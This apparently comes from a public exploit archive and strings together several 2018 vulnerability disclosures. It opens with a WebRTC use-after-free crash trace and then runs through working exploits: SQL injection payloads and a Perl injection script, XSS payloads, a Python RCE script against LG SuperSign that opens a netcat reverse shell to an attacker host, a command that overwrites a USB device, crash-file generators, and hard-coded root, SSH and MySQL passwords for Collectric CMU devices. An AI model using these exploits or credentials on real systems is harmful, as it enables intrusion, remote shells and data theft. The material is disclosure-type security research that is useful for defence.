#21 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
0x6060000031d0 is located 48 bytes inside of 56-byte region [0x6060000031a0,0x6060000031d8)
freed by thread T0 here:
#0 0x61bbb2 in operator delete(void*) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:150:3
#1 0x14ac26c in __libcpp_deallocate buildtools/third_party/libc++/trunk/include/new:279:10
#2 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1802
#3 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1556
#4 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2370
#5 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2379
#6 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/map:1200
#7 0x14ac26c in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:497
#8 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#9 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#10 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#11 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#12 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#13 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#14 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#15 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#16 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#17 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#18 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#19 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#20 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#21 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#22 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#23 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#24 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#25 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#26 0x62337d in main video/replay.cc:343:3
#27 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
previously allocated by thread T0 here:
#0 0x61af72 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
#1 0x14b664f in __libcpp_allocate buildtools/third_party/libc++/trunk/include/new:259:10
#2 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1799
#3 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1548
#4 0x14b664f in __construct_node<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:2191
#5 0x14b664f in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__tree_node<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__map_value_compare<unsigned char, std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, webrtc::DescendingSeqNumComp<unsigned char, (unsigned char)0>, true>, std::__1::allocator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> > >::__emplace_unique_impl<short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>(short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo&&) buildtools/third_party/libc++/trunk/include/__tree:2203
#6 0x14ab9ca in __emplace_unique<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:1193:16
#7 0x14ab9ca in emplace<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/map:1041
#8 0x14ab9ca in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:445
#9 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#10 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#11 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#12 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#13 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#14 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#15 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#16 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#17 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#18 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#19 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#20 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#21 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#22 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#23 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#24 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#25 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#26 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#27 0x62337d in main video/replay.cc:343:3
#28 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-use-after-free modules/video_coding/rtp_frame_reference_finder.cc:569:31 in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*)
Shadow bytes around the buggy address:
0x0c0c7fff85e0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
0x0c0c7fff85f0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0c7fff8600: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff8610: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0c7fff8620: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fa
=>0x0c0c7fff8630: fa fa fa fa fd fd fd fd fd fd[fd]fa fa fa fa fa
0x0c0c7fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==163231==ABORTING
To reproduce the issue:
1) apply new.patch to your webrtc directory
2) build video_replay
3) download the attached filed into the same directory
4) run ./video_replay --input_file uaf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45443.zip
# Title: Navigate CMS 2.8 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-09-19
# Vendor: https://www.navigatecms.com/en/home
# Software: Navigate CMS 2.8
# CVE: CVE-2018-17255
# Technical Details & Description:
# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Navigate CMS" web-application.
# The vulnerability is located in the 'fid' parameter of the`navigate.php` action GET method request.
# PoC
http://Target/navigate/navigate.php?fid=files"><marquee>RENZI</marquee>
# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
# Google Dork: "Inloggning Collectric CMU"
# Discoverer: Simon Brannstrom
# Date: 2018-09-15
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# CVE: N/A
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters,
# camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
# More vulnerabilities exists, see my other vulnerability reports.
# Parameter: lang (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
# Discoverer: Simon Brannstrom
# Date: 09/15/2018
# Vendor Homepage: http://ourenergy.se/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exists, see my other vulnerability reports.
---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin
SSH user/root credentials:
username: kplc
password: kplc
username: root
password: zoogin
*The SSH server is running Dropbear sshd 0.52 (protocol 2.0) which requires diffie-hellman-group1-sha1.
MySQL root credentials:
username: root
password: sql4u
---
# Exploit Title: Joomla! CW Article Attachments 1.0.6 - 'id' SQL Injection
# Date: 2018-09-20
# Exploit Author: Haboob Team
# Software Link: https://extensions.joomla.org/extension/cw-article-attachments/
# Version: below < 1.0.6
# CVE : CVE-2018-14592
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14592
# 1. Description
# The CWJoomla CW Article Attachments PRO extension before 2.0.7 and CW Article Attachments
# FREE extension before 1.0.6 for Joomla! allow SQL Injection within download.php.
# 2. Proof of Concept
http://IP-ADDRESS/plugins/content/cwattachments/cwattachments/helpers/download.php?id=INJECTION&sid=0123456789987654321
# Title: MyBB Visual Editor 1.8.18 - Cross-Site Scripting
# Author: Numan OZDEMIR
# Vendor Homepage: mybb.com
# Software Link: https://mybb.com/download/
# Version: Up to v1.8.18. Fixed in v1.8.19.
# PoC Video: https://numanozdemir.com/mybb/xss.mp4
# CVE: CVE-2018-17128
# Description:
# Attacker can run JavaScript codes in victim user's browser while victim is replying a post.
# 'videotype' section causes this.
# How to Reproduce:
1)- Enter to thread posting page. (newthread.php, enter title and content.)
2)- Click "insert a video" command. Select any source and insert any URL.
3)- Edit the video source with your payload.
Or, directly add this code:
[video=PAYLOAD]http://victim.com[/video]
Example:
[video=PA<svg/onload=alert('xss')>YLOAD]http://victim.com[/video]
4)- Post the thread.
# While victim user replying your post, his browser will run JavaScript.
# Vulnerable pages: editpost.php, newreply.php, private.php
# and all Visual Editor embedded pages.
# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution
# Date: 2018-09-18
# Exploit Author: Alejandro Fanjul
# Vendor Homepage:https://www.lg.com
# Software Link: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSignEZ 1.3
# Tested on: LG WebOS 3.10
# CVE : CVE-2018-17173
# 1. Description
# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone
# to remote code execution due to an improper parameter handling
# 2. Proof of concept
# Code to exploit the vulnerability
import requests
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
help="lhost")
parser.add_argument("-p", "--lport", dest="lport",
help="lport")
args = parser.parse_args()
#LG SupersignEZ always run in port 9080, so in target you must type: #LG_SuperSign_IP:9080
#Example
#supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444
#In the attacker machine wait for the shell with nc -lvp 4444
#enjoy your shell
s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')
# Exploit Title: Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-18
# Vendor Homepage: http://arenam.ru/
# Software Link: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/amgallery/
# Version: 1.2.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# # # # #
# POC:
#
# 1)
# # # # #
#!/usr/bin/perl -w
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
+
Joomla! Component AMGallery 1.2.3 - SQL Injection
################################################################################
";
use LWP::UserAgent;
print "\nTarget:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$efe="%2d%36%36%36%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%23";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0');
$host = $target . "?filter_category_id=".$efe."";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<h2 class="amGalleryCatTitle">(.*?)<\/h2>/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
# Exploit: udisks2 2.8.0 - Denial of Service (PoC)
# Author: oxagast
# Date: 2018-09-22
# Vendor Homepage: http://storaged.org/
# Software Link: https://github.com/storaged-project/udisks
# Version: <=udisks2 2.8.0
# Tested on: Ubuntu x64
__ _ _ __ ___ __ ____ ____
/ ( \/ )/ _\ / __)/ _\/ ___(_ _)
( O ) (/ ( (_ / \___ \ )(
\__(_/\_\_/\_/\___\_/\_(____/(__)
# ========The vulnerable section of code is:========
#if GLIB_CHECK_VERSION(2, 50, 0)
g_log_structured ("udisks", (GLogLevelFlags) level,
"MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid),
"CODE_FUNC", function, "CODE_FILE", location);
#else
g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function);
# =================Short Whitepaper=================
# The vulnerability can be triggered by using one computer to create a filesystem on a USB key
# (or other removable media), then editing it's filesystem label to include a bunch of %n's, removing and
# inserting the media into another computer running udisks2 <=2.8.0. This binary runs as root, and if
# exploited in that capacity could potentially allow full compromise. This will cause a denial of service,
# crashing udisks2 and not letting it restart (or until /var/lib/udisks2/mounted-fs is
# removed and the system is restarted). This keeps the system from automounting things like USB drives and CDs.
# The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it
# in the label of the drive. I tried to exploit it for a couple days, but cannot find a filesystem with a
# lengthy enough label to be able to fit the exploit and spawn a root shell, as the smallest shellcode I
# could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters.
# =============Proof of Concept Code================
# This code will destroy any information on /dev/sdb1!!!! Change that to where you have your USB media.
# PoC source code:
genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1
# Now remove and reinsert the media and wait for the crash report.
# Exploit Title: RICOH Aficio MP 301 Printer - Cross-Site Scripting
# Date: 2018-09-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-301spf-black-and-white-laser-multifunction-printer/_/R-416185
# Software: RICOH Printer
# Product Version: Aficio MP 301
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection and Stored XSS
# CVE: N/A
# On the RICOH Aficio MP 301 printer, HTML Injection and Stored XSS vulnerabilities have been
# discovered in the area of adding addresses via the entryNameIn parameter
# to /web/entry/en/address/adrsSetUserWizard.cgi.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 138.100.78.33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://138.100.78.33/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 192
Cookie: risessionid=082172179372966; cookieOnOffChecker=on; wimsesid=163487735
Connection: close
mode=ADDUSER&step=BASE&wimToken=507435387&entryIndexIn=00038&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
# Exploit Title: Termite 3.4 - Denial of Service (PoC)
# Author: Abdullah Alıç
# Discovey Date: 2018-09-23
# Vendor notified : 2018-09-24
# Homepage: https://www.compuphase.com
# Software Link: https://www.compuphase.com/software_termite.htm
# Tested Version: 3.4
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "boom.txt". Copy the content of the new file "boom.txt".
# Start termite 3.4 terminal click "Settings" Paste the content into field "User interface langauge" click "OK"
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01
# Exploit Title: Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/auction-factory/
# Version: 4.5.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_auctionfactory&task=listauctions&filter_order_Dir=[SQL]&filter_order=[SQL]
%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
# Exploit Title: SoftX FTP Client 3.3 - Denial of Service (PoC)
# Discovery by: Cemal Cihad ÇİFTÇİ
# Discovery Date: 2018-09-24
# Tested Version: 3.3
# Vulnerability Type: DOS
# Tested on OS: Windows XP Professional Service Pack 3
# Vendor Homepage: www.softx.org
# Download Link: http://www.softx.org/ftp.html
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "boom.txt". Copy the content of the new file "boom.txt".
# Now start the program. Now when you are inside of the program's Site
# Manager window click "New" > "New Site". In the field: "Site Label" paste
# the copied content from "boom.txt".
# Now click "OK" and see a crash!
#!/usr/bin/python
buffer = "A" * 2500
payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"